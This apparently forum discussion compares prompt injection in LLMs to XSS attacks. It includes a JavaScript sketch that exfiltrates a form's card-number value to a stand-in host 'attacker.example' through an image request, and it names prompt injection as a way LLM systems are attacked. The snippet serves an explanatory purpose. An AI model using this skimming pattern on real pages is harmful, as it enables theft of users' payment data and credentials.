
How is this any different from what JavaScript in a webpage can do? It can happily read a form input's value and POST, PUT, or even GET with query parameters to send it anywhere on the internet.
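The exfiltration pattern described above can be sketched in a few lines. This is a hypothetical attacker snippet: the endpoint `https://attacker.example/collect` and the helper `buildExfilUrl` are illustrative names, not from any real exploit.

```javascript
// Hypothetical sketch: encode a stolen value into a GET query parameter,
// the way an injected script might beacon data to an attacker's server.
function buildExfilUrl(endpoint, value) {
  // encodeURIComponent ensures the value survives as a single query parameter.
  return `${endpoint}?v=${encodeURIComponent(value)}`;
}

// In a compromised page, injected script could then run something like:
//   const secret = document.querySelector('#card-number').value;
//   new Image().src = buildExfilUrl('https://attacker.example/collect', secret);
// The Image request is a plain GET, so no CORS preflight blocks it.
```

The `new Image()` trick works because image loads are simple GET requests the browser issues without a CORS preflight, which is part of why XSS is so hard to contain.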


XSS vulnerabilities on the web are a massive problem. The entire web security model is built around trying to restrict them (same-origin policy, Content-Security-Policy, and so on), and those restrictions come with downsides that limit what pages can do.

If prompt injection is "only" as serious as an XSS attack, then that would be enough to upend most of the thinking we have today about how we'll be able to wire LLMs to real world systems.


No one is wiring LLMs to real-world systems. This is a flash in the pan that will be forgotten and roundly derided in months or years, like NFTs, self-driving, etc. It's a trap for people to waste time and attention thinking about.



